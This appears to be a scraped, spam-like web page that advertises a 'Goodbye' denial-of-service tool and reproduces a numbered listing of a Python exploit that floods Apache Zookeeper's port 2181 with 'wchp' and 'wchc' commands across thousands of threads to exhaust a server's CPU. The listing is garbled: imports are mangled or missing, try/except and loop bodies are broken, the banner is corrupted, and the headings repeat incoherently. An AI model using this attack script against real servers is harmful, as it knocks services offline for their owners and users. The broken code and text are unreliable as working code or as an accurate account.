15.09.2019

Goodbye 3 / 5.2 Denial Of Service Tool

83

Since the early days of the Internet, 'denial-of-service' (DoS) attacks have been a fact of life. The goal of these attacks is to restrict on a grand scale the availability of certain online systems and/or services or to.

Goodbye 3 / 5.2 Denial Of Service Tools

DenialGoodbye 3 / 5.2 denial of service toolkit

Goodbye 3 / 5.2 Denial Of Service Toolkit

  1. # Exploit Title: Zookeeper Client Denial Of Service (Port 2181)
  2. # Exploit Author: Brandon Dennis
  3. # Software Link: http://zookeeper.apache.org/releases.html#download
  4. # Tested on: Windows 2008 R2, Windows 2012 R2 x64 & x86
  5. # Description: The wchp command to the ZK port 2181 will gather open internal files by each session/watcher and organize them for the requesting client.
  6. # This command is CPU intensive and will cause a denial of service to the port as well as spike the CPU of the remote machine to 90-100% consistently before any other traffic.
  7. # The average amount of threads uses was 10000 for testing. This should work on all 3.x+ versions of Zookeeper.
  8. importos
  9. importsys
  10. exitStr ='n'
  11. threads =[]
  12. port =2181
  13. def sendCommand(ipAddress, port):
  14. s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  15. s.send('wchpr'.encode('utf-8'))
  16. s.send('wchcr'.encode('utf-8'))
  17. except:
  18. def runCMD(id, stop, ipAddress, port):
  19. sendCommand(ipAddress, port)
  20. break
  21. banner ='' _______ __ _____ _
  22. / / / / / /_ __ __ _ ___ __ ___ _ __
  23. ./ /__ __/ (_ __ __
  24. Email: bdennis@mail.hodges.edu
  25. print(banner)
  26. numOfThreads =int(input('How many threads do you want to use: '))
  27. for i inrange(numOfThreads):
  28. t =threading.Thread(target=runCMD, args=(id,lambda: stop_threads, ipAddress, port))
  29. t.start()
  30. while exitStr !='y':
  31. exitStr ='y'
  32. print('nStopping Threads...')
  33. forthreadin threads:
  34. sys.exit(0);